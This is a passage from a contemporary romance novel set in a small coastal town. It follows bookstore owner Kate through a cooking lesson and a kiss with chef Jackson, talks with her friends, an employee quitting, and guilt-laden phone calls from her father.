"Is that all it's about, sales?" He sounded disgusted, outraged. "Is that why you stopped writing? Because it didn't sell? That's just... I mean, if you've got a gift, and it's just about money... "
She turned back toward him, defensive now. "I didn't stop writing. I stopped getting published. Sales do matter when a publisher is deciding whether to offer you a contract. They matter very much."
She could see him mentally backpedaling, trying to rein in his aggressive attitude. "Yeah, I guess that's true."
"Anyway. I'm glad you liked the book." She changed the subject. "So. What are we going to cook?"
The menu he'd selected for Zach and Sherry's dinner was elegant and sophisticated, but none of it required advanced cooking skills. They'd start with an appetizer of mushroom pizzette—a kind of small pizza topped with button, crimini, and shiitake mushrooms—then move on to a main course of herb roasted pork shoulder with parmesan polenta and a salad of escarole and radicchio with fennel. Dessert would be poached pears with fresh whipped cream.
Kate looked at the menu and her face fell. "This is... I don't know if I can do this. It sounds amazing, but if it doesn't come in a microwaveable tray, I'm pretty much adrift."
"No." He waved off her objections. "The whole point of this menu is that it looks and sounds impressive, but anyone can do it."
She still wasn't sure. "Really?"
"Sure. And it all works well to make ahead the day of the dinner, so you can get it ready and then get out of the way before they get here."
She poured him a glass of chardonnay as they started pulling food and supplies from the bags he'd brought. She'd worried about how he'd react to the wine—would he call her an idiot again? But when he took a sip, his eyebrows raised in appreciation.
"Mmm, not bad. Did Rose get you this?"
She nodded. "Yeah. She's my go-to guy for wine."
He grinned. "Mine too. Okay, let's get the pork roast into the oven first thing, because it takes a while to cook. Then we can work on the side dishes and the appetizer."
She'd expected him to make the food while she watched; she'd heard stories about how controlling he was when it came to cooking. Instead, he showed her how to score the skin on the pork roast, directed her in rubbing it with garlic, rosemary, and sage, gave her tips on the best way to roll the roast and tie it with twine, and then nodded with approval as she slid it into the oven.
"Well, that wasn't so hard," she said. "How long will this take? I haven't eaten since lunch."
"The roast? About three hours."
She gaped at him. "Three _hours_?"
"Yeah, but don't worry. We'll make the mushroom pizzette next. It won't take long, and it'll give us something to munch on while we work."
Together they sliced mushrooms, grated cheese, and stretched out the ball of pizza dough he'd brought. (He suggested premade dough, to make the process easier for her on Friday night. She was grateful.) They placed the pizzette on a baking pan and slid it into the oven and onto the rack beneath the pork roast. While they waited for it to bake, he discussed the importance of organization and cleanliness, showing her how to clean up as she worked so she wouldn't have an enormous mess at the end of the evening.
When the pizzette came out of the oven, Kate inhaled the scent, eyes closed in bliss. "God, that smells fantastic."
"Well, as it happens, we have a break now, because we don't have to make the polenta until the roast is nearly done. Here, let's have some of this." He rummaged around in her kitchen drawers for a pizza cutter. When he found one, he sliced the pizzette into six neat wedges and arranged them on a plate. They refilled their wine glasses and took them and the food out onto the deck, where the sunset was in its full glory. Kate put the plate on a side table between the two Adirondack chairs she kept on the deck, and they ate and sipped wine while the sun washed the sky and the ocean in oranges, pinks, and reds.
"This is amazing," Kate said, munching on a piece of the appetizer they'd made. "But I'd have expected no different, coming from you."
He shook his head. "What's amazing is this view. Jesus. This spot has got to be one of the best lots in town."
Kate nodded and took another sip of wine. "It's one of the original houses in this part of town. It seems like one by one, all of the older houses are being torn down and replaced with architectural showpieces. Of course, the small size of the lots here, combined with restrictions on blocking other people's views, means none of them are very big. But still, this place is starting to look like an eyesore next to the neighbors. I need to get some renovations done, but there never seems to be enough money."
He shrugged. "I don't think it's an eyesore at all. It's a little older, sure, but I think it's great. I like what you've done inside, too. It's homey. Comfortable."
She flushed with warmth at the compliment. "I think so, too. I haven't changed it much since it was my mother's. Most of the furniture, the décor, is hers. Being here, with all of her things, makes me feel closer to her."
"How did she die?" He looked at her cautiously, clearly gauging whether this was an acceptable avenue of conversation.
"Ovarian cancer. She was sick for a long time before I even knew."
His eyebrows furrowed in concern. "She didn't tell you?"
"She didn't know. She'd been having symptoms for over a year, but she kept ignoring them, thinking it was just aging." She shook her head. "By the time she decided to see someone, it was too late. She didn't have a chance." Tears filled her eyes, and her vision blurred. She swiped at them. "I'm getting emotional. Sorry."
"Hey. We don't have to talk about this if you don't want to." He put a hand on her arm.
"No, that's okay. I can talk about it. It's just, I've always wondered if it would have made a difference if I'd been here more. If I'd seen her more. I would have known something was wrong. I'd have made her get help sooner."
He shook his head. "You don't know that."
"What do you mean?" She sniffed a little and looked at him. He was leaning toward her, all concern and intense attention. She caught his scent, cologne and soap and white wine, and something more earthy and manly.
"What I mean is, maybe you wouldn't have seen it. Maybe you'd have thought what she did—that it was normal aging. Or maybe you'd have nagged her to get help, and she still wouldn't have done it. You don't know. Also, and maybe most importantly, her health wasn't just on you. It was her responsibility, too."
She looked down into her wine glass. "I guess."
"Also, shit happens. No matter what you do. It just happens."
From his tone, she could guess that he wasn't just talking about her and her mother. He was talking about himself, and the shit that had happened in his own life. It made her want to know more about him.
She nodded. "Yes. You're right. I know that." And she did. Still, she started to cry. She struggled to keep the emotions inside, but the tears started to flow freely. "I'm sorry," she said. "This is stupid. It's been five years. Excuse me a minute. Let me just... "
She rose from her chair and started to go inside, thinking that she would compose herself in the bathroom, wipe her eyes, blow her nose, make herself presentable before emerging again. Instead, he rose with her and caught her arm in his hand.
"Kate, wait."
She turned to him. He was standing close, his broad chest inches from her, his hand gently resting on her arm. He looked down at her, and she could feel his breath on her, smell his warm male scent.
"I know what it's like to lose people," he said. She could feel his voice in the trembling of her skin. "I know how hard it is. I'm sorry about your mom." He put his arms around her and drew her into a warm embrace. His heartbeat thrummed under the sounds of the breeze and the surf.
"Thank you," she murmured, turning her face toward his. "I... "
That was all she got out, because then his mouth was lowering toward hers. The kiss started gently, a feather-light touch. A surge of heat ran through her body. She'd known it would if she ever touched him, kissed him, but this... The force of the jolt was unexpected. He pulled away slightly, his eyes gauging her reaction.
Then she launched herself at him.
It had been so long, so long since Marcus, so long since she'd let herself feel this electric current of desire. She claimed his mouth with hers, pulled his body to her like it had always belonged there, pressed against her.
He let out a groan from deep in his throat and advanced, pushing her backward until her back was pressed against the wall, his mouth devouring hers before he released it and began tasting her jaw and the tender skin of her neck.
"Oh. Oh my... oh. God." Her body was on fire, mirroring the blazing colors of the horizon.
When they pulled apart, he was the one who was pushing her away, holding her at a distance with his hands against her shoulders.
"That was... Jesus. I need a minute." He scrubbed at his face with his hands, grabbed his wine glass from the side table, downed the contents in one gulp, and then went into the house.
She leaned back against the side of the house, her pulse pounding, all thoughts of grief and sorrow forgotten.
She could feel the stupid grin on her face but couldn't seem to remove it.
_Holy hell_.
She went into the house and found him emerging from the bathroom, where a bit of moisture at his collar told her he'd been in there splashing cold water on his face.
"Hey there," she said, perching on the arm of the sofa. "Where'd you go?"
"Look, I didn't mean... I'm sorry."
"What the hell for?"
He fidgeted with his hands. "Well, you were upset, and I took advantage."
"I've got to invite you over and get upset more often."
From the look on his face, he seemed puzzled that his _I'm a cad, you're an innocent, oppressed damsel_ script was not working out.
"I should probably go," he said.
"What? Why?"
"It's just, you know. Before things get out of hand."
"Would that be so bad?" She got up and walked toward him, and he backed up until his butt was against the kitchen counter.
"I'm serious."
She could see that he was. They'd shared a moment of high-voltage electricity. And now he wanted to leave.
"Okay." She tried to keep the disappointment and confusion out of her voice. "But what about the dinner? The cooking lesson. You've only showed me..."
"Take the pork roast out in"—he checked his watch—"about another hour." He headed toward the door.
"What about the polenta? The salad?"
"I'll email you the instructions."
"But your pans! Your supplies!"
"Just keep them for now. You can get them back to me later."
He hit the door at a near run. He was on the sidewalk and halfway to his car when she called after him. "Jackson!"
He stopped and turned toward her.
"Why the hell are you running away?"
He seemed as though he might answer, but then he simply got into his car and drove away, his tires screeching slightly on the pavement as he accelerated.
# 8
"... And then he ran out of here like there were wolves chasing him."
"Wow." Kate and Gen were sitting at her dining room table, eating the pork roast and the rest of the mushroom pizzette with a bagged salad Gen had brought up from her apartment. They were well into a bottle of wine, and Kate was waving her glass around for emphasis.
"I mean, this kiss was epic. Freaking _amazing_. And then, poof. He shot out that door like his ass was on fire."
Gen looked thoughtful. "That's not the reaction you usually expect after an epic kiss."
"No, it is not." Kate took another bite of pork roast. "Jeez, this is fabulous. But anyway. It's not like I was expecting a night of out-of-control jungle sex, just because we kissed. Though that would have been nice. But maybe another kiss or two. Some talking. Eat the pork roast."
"There's a story here." Gen pointed her fork at Kate.
"What do you mean?"
"I mean, there's something you don't know about him or his history that caused him to, you know, run like his ass was on fire." Gen raised one eyebrow at Kate pointedly.
Kate threw her hands up in frustration. "I don't know _anything_ about him or his history. Which I might, if he'd stayed around long enough for, I don't know, a _conversation_ about those things. But he didn't. He pulled out all of these painful emotional revelations from me, and then... Oh, no."
" 'Oh no' what?"
"I talked about my mom, and I cried. Right before the kiss."
"So?" Gen poured them each another half glass of wine.
"So, I don't know why I didn't see this before. I talked about my feelings and cried. And then he ran. You don't suppose he's so unevolved that he just couldn't cope with feelings, do you?"
Gen sighed. "God, I hope not. That would be depressing."
"Men can be that way, though." Kate got up and cleared their plates from the table. She carried them into the kitchen, turned back to Gen, and leaned against the counter.
"Yes, they can," Gen agreed.
Kate blew out a breath and ran her hands through her hair. "Well, that sucks. If that's what it is. Who would even want a guy you can't talk to? What would be the point?"
"I don't know." Gen hefted the platter bearing the rest of the pork roast and brought it into the kitchen, where she started running hot, soapy water in the sink. "I guess there isn't one."
"I guess not."
"At least he weeded himself out early, before you got emotionally invested."
"But?" Gen looked at Kate expectantly.
"But, there was that kiss."
"Ah, that. Well, you could always keep your girly, emotional trap shut and just use him for sex."
Kate had to admit, the idea held a certain appeal.
"God. What is _wrong_ with me?" Jackson was gently banging his head against the wall in the pool room at Ted's. Daniel stood across the pool table from him, cue in hand, an amused look on his face.
"She's probably wondering the same thing right about now."
"No doubt."
"Come on," Daniel urged. "It's your turn."
Jackson picked up his cue, surveyed the table miserably, and lined up his shot. "I was so fucking _rude_. I hauled ass out of there without even explaining about the poached pears." He took his shot, and the cue ball sent the nine careening pointlessly.
"Oh, horrors. You forgot about the poached pears!"
"Shut up."
Jackson drank from a mug of beer as Daniel took his turn. Daniel, who wasn't in turmoil over a woman, was beating Jackson handily. He sank several balls, and when he finally missed, he straightened and faced Jackson.
"So, why? Why did you rush out of there like that, especially after what you describe as a very good kiss?"
Jackson shook his head and rubbed at his eyes. "I don't know."
"Yeah, you do."
"Oh, fuck off. You're worse than a shrink."
They stayed silent while Jackson took his turn. He sank the twelve, then missed an attempt to get the fourteen in the corner pocket.
"Yeah, I guess I do know," he finally admitted.
"Okay. So what was it?"
"I was afraid we were gonna sleep together."
Daniel peered up at him from where he was leaning over the table. "You know that if a girl pressures you, it's okay to say no."
"Ah, you're such an asshole. Shut up."
Daniel chuckled. "Sorry, sorry. Go on."
"It's just... " Jackson took a moment to gather his thoughts. "That's what I always do. I meet a woman, we go out, we sleep together right away. And it's good. But then pretty soon it isn't good anymore. It's what I always do. And I'm afraid if I do what I always do... "
"It's going to turn out the way it always does," Daniel finished for him.
"Well... yeah."
Daniel took a slug from his beer and looked thoughtful. "Okay. You're not wrong that maybe you should take a different approach this time. Except that now you've got her thinking the kiss was just so repellent to you that you couldn't wait to get out of there."
The thought hit Jackson with surprising force. "But that isn't... She can't think that. Does she?"
Daniel shrugged. "It's possible."
"Ah, jeez."
"So what are you going to do?"
Jackson pointed one finger at Daniel. "That kiss was not repellent."
"I repeat," Daniel said. "So, what are you going to do?"
"I don't know. But I'll think of something."
The next morning, a Wednesday, Kate was unlocking the front door at Swept Away, putting out her sandwich board sign advertising ten percent off new releases, when Jackson's truck drove by on Main Street as he headed toward Neptune.
She was involved in her tasks and didn't notice him until the truck came to an abrupt stop two doors down. The street was mostly empty at this hour, so he threw the truck into reverse and pulled to a stop in front of her. Jackson put the truck in park, pulled on the emergency brake, and got out, his face stormy and intense.
He stomped over to where she was arranging the sandwich board.
She looked up in surprise. "Jackson, hi. What... "
That was all she got out before he grabbed her, pulled her into his arms, and kissed her with an intensity that made her toes tingle. In an instant she was hot and limp, melting against him, feeling the rush of pleasure and fire through her veins.
Just as abruptly, he released her, leaving her barely able to stand upright.
"Last night's kiss was _not_ repellent," he said, pointing one finger at her.
"Okay. No. I didn't think it was." She leaned against the door of the shop for support.
He got back into his truck, threw it into drive, and sped away, leaving Kate to wave after him with a dreamy look on her face.
Kate didn't see Jackson over the next couple of days—but she did hear from him. He sent her emails detailing the preparation of the dishes he'd neglected to make the night he'd come to her house. Instructions on the polenta, including tips to keep it from sticking to the pan or clumping. A reminder that she could make the poached pears ahead of time and have them finished and out of the way before Zach and Sherry arrived. A course-by-course wine pairing list, along with a note indicating that he didn't expect her to provide a different wine for each course, he simply wanted her to have that option. A note on where she should buy the produce for the salad, and where she could find the most succulent pork roast. Some hints on presentation, including plating and garnishing.
All in all, it amounted to more than a dozen emails between the kiss on Wednesday morning and the dinner on Friday night. On Friday morning, Lacy dropped by the shop before her shift at Jitters, and Kate showed her the long series of emails, some businesslike, some chatty, some with photos attached as visual aids.
Lacy browsed the emails and laughed. "Oh honey, he's got it bad."
"You think?" Kate was peering at the screen over Lacy's shoulder.
"Oh, yeah. No question. Most of these are just so he can be in touch with you. I mean, nobody cares that much about how to make polenta."
Kate considered that. "He's Jackson Graham. He might care that much about polenta."
"Okay, granted. Fair point. But look at this one, about the polenta." She brought up one of the emails and gestured at the screen. " 'Stir with a counter-clockwise wrist motion'? At this point, he's just making stuff up. He just wants to be writing to you."
Kate leaned one hip against the counter, arms crossed, considering. "Do we think that's creepy or cute?"
"Oh, cute, definitely. I wish I had a guy that hot advising me on my counter-clockwise wrist motion." She sighed. "So, what are you going to do about him?"
"What do you mean?"
Lacy clicked the laptop shut. "I mean, this isn't the Dark Ages when women had to wait for men to ask their fathers for permission to take them courting. He can make moves, you can make moves. He can ravish you in front of the store, you can... I don't know. Call him."
"I'm not sure," Kate said.
"Which part aren't you sure about? The part where it's not the Dark Ages, or the part where you call him?"
"The part where I call him."
Kate pulled some new releases out of a carton and stacked them on a shelf. Lacy followed her around while she worked.
"Why aren't you sure?"
Kate shrugged, her arms full of books. "It's just, the way he rushed out on Tuesday night was kind of... strange. I don't know what it means. I don't know what to think about it."
"You could try asking him what it means."
"He's a guy. He probably doesn't know what it means."
"Well. Right. That could be true. We could ask Gen to ask Daniel Reed. She's doing a lot of work with him at the gallery right now, and he's Jackson's best friend."
"No." Kate stopped what she was doing and faced Lacy, her hands full of books. "We're not doing that. We are not in ninth grade."
"Okay, okay." Lacy grumbled under her breath, "But it always worked for me in ninth grade."
On Friday, Kate left Althea in charge in the afternoon and left work early to plan for the evening. She bought the groceries according to the list Jackson had provided for her. She went home, carefully prepared the pork roast as he had taught her, and put it in the oven. She made the salad—all except for the dressing—covered it in plastic wrap, and set it in the refrigerator for later.
She poached the pears just as he'd told her in a particular step-by-step email that had run several pages when printed out. They smelled fantastic. When those were done, she put them in a decorative bowl, wrapped them, and put them away. She whipped the cream to go on top, and put that in the refrigerator next to the pears.
For someone who didn't cook often, she felt good about how it all was turning out. She burned the edges of the crust of the pizzette, but that problem was solved with some creative slicing of the appetizer. Some of the polenta did stick to the pan, as she'd feared, but enough didn't that it hardly mattered.
When the food was ready, she turned her attention to the house. She tidied everything up, cleaning the kitchen and putting away the pots and pans, sweeping the floor, shoving her own clutter into cupboards and closets until it was out of sight, placing candles strategically throughout the house, and sprinkling dark red rose petals across her comforter.
By the time she had dragged the dining room table out onto the deck and had set the table with white linens and sparkling dishes, she was beginning to feel a little jealous that this dinner was for someone else and not for her. When was the last time a man had made a fuss over her?
Of course, to be accurate, Zach wasn't making a fuss over Sherry—Kate was. But when was the last time a man had gone to the trouble to enlist someone else to make it look like he'd made a fuss over Kate? Never. Or at least, it had been so long that she barely remembered.
Kate hoped that Sherry would appreciate the gesture—regardless of who had actually done the work—and she also hoped that Zach would follow through on his intentions to compromise in the relationship to make it work. While she wanted these things for Zach, so that he could save his relationship and be happy, she wanted it for her own reasons, as well. She wanted to believe that a marriage could work, that problems could be worked out, that love could prevail in the face of differences and disagreements. She wanted to believe in romance. She wanted to have _hope_. Hope for love in general, but also hope for love for herself.
If she could engineer another chance for Zach, maybe someday she could do the same for herself.
When Zach arrived, she showed him around the house and gave him a last-minute briefing on how to reheat everything, which course to serve when, how to plate it—according to Jackson—and how to complete the last-minute prep.
She instructed him to tell Sherry he'd made the food himself, and even gave him some details on the preparation of each dish so he'd be able to sound convincing, should she start asking questions. Then, finally, she'd wished him luck and hurried out of there before Sherry's scheduled arrival.
"Kate? Thank you," Zach had said at the door as she'd rushed down the walkway and toward the stairs down to Gen's apartment. "I mean it. This is great."
"You're welcome. Just don't screw it up. Don't argue with her! About anything. Don't get into that ex-spouses-bickering-about-old-grudges thing. Remember, you're wooing her!"
"I've got it." He went over to her, kissed her on the cheek, and squeezed her hand. "You're the best, Kate."
"Yeah, yeah." She waved him off. "Now, win that woman!"
She spent the evening down at Gen's place, where Kate ate takeout pizza and Gen munched on a salad, and they watched movies on Netflix. Once or twice, when they'd heard Zach and Sherry moving around on the deck overhead, Kate had eased open the sliding glass door and listened to see how things were going. She knew she shouldn't be eavesdropping, but after all her work, she couldn't help it. She'd heard soft voices, but couldn't quite make out what they were saying. It was just as well, since, of course, it was none of her business.
Kate had planned to sleep down at Gen's place, but that turned out not to be necessary. At around eleven, Zach texted her to say they wouldn't be spending the night. At first, Kate had been alarmed, thinking something with the date must have gone wrong. But he reassured her, saying that Sherry had agreed to go to counseling with him so they could try again—mission accomplished. She just hadn't been ready to take the step of spending the night with him.
So, she'd gone upstairs, said goodnight to Zach, put the place back in order—he'd washed the dishes, but there were still the candles and rose petals to deal with—and crawled into bed. Propped up against the pillows, she'd taken one last look at her laptop before turning in for the night.
Logging in to her email, she found a message from Jackson, sent just fifteen minutes earlier.
_How'd it go?_
She wrote back:
_Pretty well. The food looked good. I burned the edges of the pizzette, though._
She looked at the clock. At almost midnight on a Friday night, he was probably just finishing up at the restaurant, preparing to go home. She thought she likely would not hear from him again until the following morning, so she was surprised when a response promptly appeared in her inbox.
_Cut off the burned parts?_
She grinned and wrote back:
_That's what I did. Zach said it went great._
She got no response for a while, and she thought she should shut the laptop and go to sleep. Just as she was about to follow through on that thought, another message came in.
_Since Zach and Sherry had a nice date, maybe we should, too._
A little zing of excitement rushed through her. She typed:
_What did you have in mind?_
His response came in moments later.
_I'll call you tomorrow to ask you in a gentlemanly fashion, without the email._
Jackson was going to ask her out, formally, on a date. She thought of kissing him, first on her deck and later outside the shop. She remembered the rush, the liquid feeling of desire.
_Okay._ ☺
She looked at her unsent response, considered whether the emoticon made her look like a teenager, and deleted it. She tried several alternative answers:
_I'll talk to you tomorrow._
_Tomorrow, then._
_Talk to you then, big guy._
She deleted them all and laughed at herself. In the end, she opted for:
_Thank you for your help with the dinner. Have a good night, and I'll talk to you tomorrow._
She closed the laptop, set it on the side table, and snuggled down under her covers.
# 9
The following day she had plenty of work to do at the shop. Saturday was one of her busiest days, especially during summer. She opened an hour earlier and closed an hour later than she did during the rest of the week, and she also liked to provide a little something extra on the weekends: an author appearance, tea and cookies, or maybe story time and a craft in the children's section.
Today, she was keeping it simple, with a two-for-one sale on used books and a refreshment table including lemonade and cookies from the bakery case at Jitters. Simple mattered, because she and Althea still had to plan their Art Walk event, and they were running out of time. The more rumors filtered through to her about what everyone else on Main Street was doing, the more she realized she was going to be caught unprepared if she didn't get moving.
She was planning to meet Althea for a brainstorming session at nine a.m. The store would be open, but business usually was slow that early in the morning. It would give them time to think, to discuss, to hash out a solid plan for their event.
Jackson was supposed to call her today, but she willed herself not to think about it. How stupid would it be for a grown woman to wait by the phone, all nervous and moony-eyed? It would be very stupid, indeed. She was a responsible business owner, and she had things to do. Things other than waiting for a man to call.
She dressed for the day—linen capris, a pair of stylish sandals, and a silky sleeveless blouse—gathered her things, and got out of the house by eight thirty. The morning was clear and warm, with a light breeze coming off the ocean. Temperatures in the low seventies. A perfect summer day.
She parked her car in a space behind the store and walked over to Jitters to pick up her cookie order. Occasionally, when she wanted something special, she had the bakery down the street make her iced sugar cookies shaped and decorated like popular books, but that was too much time and expense for a regular Saturday. The basic shortbread cookies at Jitters would have to do.
When she popped her head into the coffee place, Lacy was behind the counter, apron on, making espresso for a waiting customer. The strong scent of coffee hit her the moment she walked in the door, along with the sounds of easy conversation and the light jazz playing over the speaker system.
"Hey!" Lacy greeted her. "You here for the cookies?"
"Yeah. And, mmm. Maybe a latte. I had coffee at home, but I can't resist the smell."
"Coming right up." Lacy finished the other customer's order and started making Kate's soy latte, with extra foam and a sprinkling of cinnamon. "So, how'd it go last night?" Lacy asked while she worked. "With Zach and his ex?"
"Good. At least, he says it was good. They didn't stay the night—so there's that—but he says she's agreed to go to counseling with him, see if it's worth trying again."
"Well, that's something," Lacy said over the whoosh of the milk steamer.
"Yeah, it is. I hope it works out for him. He's a good guy. Just... you know. Not for me."
"Not like a certain auburn-haired chef I know." Lacy grinned at Kate as she set her latte on the counter in a large to-go cup.
"Oh, stop it."
"What's up with that, anyway?" Lacy leaned forward conspiratorially, her forearms braced on the counter.
"He's supposed to call me today." Kate took a sip of the latte and sighed in pleasure.
"Post-dinner recap? A critique of your braising skills? Deconstruction of your counter-clockwise wrist motion?"
"He says he's going to ask me out."
Lacy stood up straight. "On a date?"
"That was my assumption."
Lacy pumped one arm in the air. "Woo, woo!"
Kate shook her head vigorously. "No. Not, 'woo woo.' It's just... well, I don't know what it is yet. Let's hold onto our celebrations until we see what it is."
"Fair enough."
Connor, a dark-haired guy in his twenties who was working behind the counter with Lacy, emerged from the back room with a pink bakery box filled with Kate's cookies. "Here ya go, Kate. I'll ring you up."
"Thanks, Connor."
As she was handing over her debit card, he said, "It sounds kind of 'woo woo' to me. I mean, I heard about that kiss he laid on you earlier this week. Hot." He shrugged. "I mean, I didn't see it. But I heard it was hot."
Kate looked at him, stunned. "You heard about the kiss?"
"Well, yeah." He handed back her debit card and receipt. "Around here, everybody knows everything. You know how it is. But don't worry, nobody's judging."
"They're not?"
"Nah. They're saying it's about time."
Kate didn't like the fact that people in town were talking about her kiss, but she shouldn't have been surprised. Small towns were like that. And Main Street was a small town within a small town. If Owen at the cheese shop across the street saw something, he'd call Elinor at the clothing boutique next to him, and she'd let everyone in her bridge club know. That's just how it was. There were no secrets on Main Street.
Kate hurried into the shop, where Althea was already waiting, looking vaguely irritated—as she always did.
"We've been open five minutes already," Althea complained.
"Yes, I know. I was picking up the cookies. Help me set up the table?"
"It's ready," Althea replied. "I had plenty of time to get it prepared while I was _waiting_ for you."
Annoyed, Kate set the cookie box and her purse on the counter and turned to Althea, fists on her hips. "Althea. Have we had even one customer by"—she checked her watch—"9:07 a.m.?"
The woman looked uncomfortable. "Well, no."
"Then perhaps you can tell me what, exactly, the burden was that you had to bear during the five- to seven-minute period when you were waiting for me."
"Well. It's not about that," the older woman insisted, her face set in an unattractive pout.
"Then what is it about? Because it seems to me that every day, you evaluate my job performance and find me lacking. I suppose you think you could run this place better than I do?"
"Yes!" she exclaimed. "I could! Anyone could! A... a... a _trained monkey_ could! At least it would _be on time_!"
The two women glared at each other for an interminable moment. A pair of tourists walked by on the sidewalk outside. Bright morning light filtered in through the windows. A fly buzzed lazily overhead before landing on a stack of books.
"It seems as though you don't really enjoy working here, Althea," Kate said at last.
"I enjoyed working for your mother," Althea said, a defiant, angry look on her face. " _She_ knew the value of promptness and professionalism. _She_ put her every spare moment into making this store something special. And _she_ knew what I was worth!"
Kate tried not to let the words hurt her, but they did. She had always suspected that she fell short of her mother, in so many ways. Here was Althea, confirming that fear. It stung, and Kate felt wounded.
"Maybe if I had some support instead of constant, nagging criticism, I might be better able to meet your expectations, Althea," Kate said coldly. "Maybe it's your attitude that's bringing down my performance."
Althea blanched. She blinked rapidly a few times. "Well. I think it might be time for us to reevaluate our arrangement here," Althea said, pouting. "I'm sure it was time long ago, in fact. I won't put up with this any longer. And I won't be talked to with such disrespect."
Never mind that Althea wasn't the one who had been compared unfavorably to a trained monkey.
Kate felt sudden remorse for the way she'd spoken to the older woman. Althea was annoying and controlling, no doubt, but that didn't mean Kate had wanted to put her out of her job.
"Althea, wait..."
Althea fussed around behind the counter, grabbing her purse, her sweater, and the lunch she had packed. "I'll just be out of your way. If it's all right with you, I'd like to pick up my final check later today." Kate could see tears forming in the woman's eyes.
"Althea, I didn't mean... "
"Yes, you did. I'll just be going. Good luck to you, Katherine." She walked out the door, the little bell affixed to the top of the door frame jingling in her wake. Kate knew that what she'd really meant was, _Good luck keeping this business afloat without me._
Kate leaned against the counter. "Well, shit."
She felt the hard press of stress against her breastbone as she arranged the cookies on a plate and placed them on a table Althea had done up with doilies and fresh-cut flowers. Under the guilt and the tension, she was a little bit relieved. Althea did a lot around here, but the woman's disdain toward Kate made every day a trial. Why did she dislike Kate so intensely? Althea had a reputation for being prickly and difficult. Maybe it was just her personality. Maybe it had nothing to do with Kate.
In any case, she was on her own now.
She put out a pitcher of iced lemonade and some cups, arranged napkins beside the cookie plate, surveyed her results, and sighed. She'd have to advertise for a replacement right away. She would need help before the Art Walk event. Then there was the fact that the store was open seven days a week, and Kate had no desire to work every day without a break. Once she found someone, it would take some time to train them well enough that they could be left alone at the store on her days off.
She didn't think Althea would suffer financially due to losing this job. From Kate's understanding, Althea was retired from a longtime job as a bookkeeper and worked mainly to keep herself busy. She'd worked here because she loved books. She just didn't seem to love Kate.
The phone rang, and Kate snatched it up. "Swept Away, this is Kate. May I help you?"
"Althea quit?"
Rose. "How could you possibly know that already?"
"She came into the wine shop just a second ago and gave me an earful. 'Your _friend_ did this, and your _friend_ did that.' Emphasizing the word 'friend,' to indicate the absurdity of anyone befriending you."
Kate groaned. "Of course. I suppose you think I was too hard on her."
"Oh, hell no," Rose said. "I don't know how you've put up with her this long. She's always been a pain in the ass."
Kate laughed. "Yes, she has. But now I don't have any help."
"You'll find someone."
"Before Art Walk?"
"Hmm. Good point."
A customer came into the store, the bell jingling. "I've gotta go," Kate said, and hung up the phone.
All morning, Kate helped customers, got caught up with bookkeeping, accepted used books from a customer in exchange for store credit, placed orders for new books, dusted shelves, washed the windows that faced Main Street, wrote Althea's final check—which she did with some grumbling—answered phone calls, and packaged some orders for shipping. By noon, she was hungry and eager to break for lunch—which she usually would have done while Althea covered the store. But now, since she was on her own, leaving would mean closing the store for an hour. She was hesitant to do that, because the stream of traffic into the shop had been steady all day. She didn't want to lose an hour worth of business.
She decided she would call Sal's, the Italian place three doors down, and have them deliver something, just as soon as she got a break. In the meantime, she grabbed a sugar cookie from the plate she'd set out and munched on it to hold her over.
In the back of her mind, she kept wondering when, and if, Jackson would call. She didn't want to be one of those women hanging on the actions of a man, but she couldn't help thinking about what she would say, and what he would say, and where it all would lead. Of course he wouldn't call now. It was noon, the lunch rush. He'd be busy at Neptune, searing scallops, or doing whatever mysterious magic with food that he did. He'd be more likely to call at midafternoon. Lunch over, the prep for dinner not yet in full swing. She'd worry about it then.
# 10
The phone did ring at around two p.m., just as she'd expected. As she reached for the phone, the dozens of times she'd rehearsed the conversation in her mind escaped her, her mind went blank, and she had no idea what she was going to say.
"Swept Away, this is Kate speaking. How may I help you?"
"Hey, honeybunny." The voice she was hearing was not the one she'd expected. A feeling of dread replaced her nerves.
"So, how's my girl?"
She tried to gauge from his voice what he would need from her this time. Money? Bail? A ridiculously inconvenient favor? As much experience as she'd had with him, she wasn't good enough to peg the reason for his call this early in the conversation.
"I'm good, Dad. What's up?"
"Why does something have to be up for a father to call his daughter?"
She rolled her eyes. They went through this routine every time. He always spent a certain amount of time pretending he was just calling out of love before getting to his real purpose. Any attempt to hurry him along would be fruitless.
"I'm sorry, of course it doesn't. It's just that the shop is really busy today, and... "
"So, you don't have time for your dad? Oh. I see. I guess that's why you haven't called me in, what is it, two months?"
Another necessary stop on their usual route: him laying guilt on her so she'd be more receptive to whatever it was he wanted from her.
"Has it been that long?" She rested her forehead against the wall as she talked. "I guess time got away from me."
"I guess it must have. Angela keeps telling me, 'Don't worry about her, she's a grown woman. She'll call when she's ready.' But a father can't help but worry."
_About yourself._
"How is Angela?"
_Besides cold, calculating, and bitchy, that is._
"Oh, you know. Dealing with some health issues. But she's hanging in there."
Angela was always "dealing with health issues." It was her method of keeping Thomas Bennet's attention on her at all times.
Kate calculated that the pleasantry requirement had been fulfilled. She waited for the inevitable request.
"So, we were wondering if we could come by for a visit. Stay a few days. Angela and I could set up in that cozy apartment you've got downstairs, and we could all spend a little quality family time."
The idea of "quality family time" with him and Angela made Kate's blood pound in her veins. Any chance of "quality family time" had evaporated when her father had left her mother—for Angela.
"I'm afraid that won't work," she said. "I've rented out the apartment."
"Whaaat?" His expression of surprise was exaggerated. "But I thought you were keeping that free for visits from family."
She banged her head softly against the wall. "Nope. It's been rented for over a year now." Which he would know if he'd been here even once during that time. Not that she wished he had.
"Well, that's okay. We can squeeze in at your place. I'm sure somebody can take the sofa."
Okay, that was a good one. If "somebody" took the sofa, that meant two people would be in the bed. And since Kate wasn't about to sleep with either her father or Angela, that meant he intended to turn her out of her own bedroom.
"If you really want to visit, there's a lovely bed and breakfast here in town," she said, feeling sick already at the thought of him coming to Cambria. "There are several, in fact. I can give you some names and phone numbers."
He was silent. Letting the guilt sink in, the fact that his own daughter didn't want him to stay with her.
"Oh. I see. You'd prefer that we stay elsewhere."
A customer walked through the door of the shop, and Kate uttered a silent prayer of thanks. "I've got to go, Dad. I have a customer."
"But I thought... "
"We'll talk later. Love you. Bye." She hung up the phone, took a deep breath, and greeted her customer. Less than five minutes later, the phone rang again.
"Swept Away."
"Angela doesn't see why we can't just stay with you."
Kate closed her eyes, tight. "She's seen my place. She knows it's very small."
"Maybe your tenant can stay with friends for a few nights. Maybe... "
"Dad. I am not turning my tenant out on the street so you can use her apartment. I have to go."
"But... "
"I'm hanging up now."
When the phone rang again five minutes after that, she was out of patience, and dispensed with her usual professional greeting.
"Look. I told you I can't talk right now. I'm _busy_. I have a _business_ to run. If you've called to lay on more guilt... "
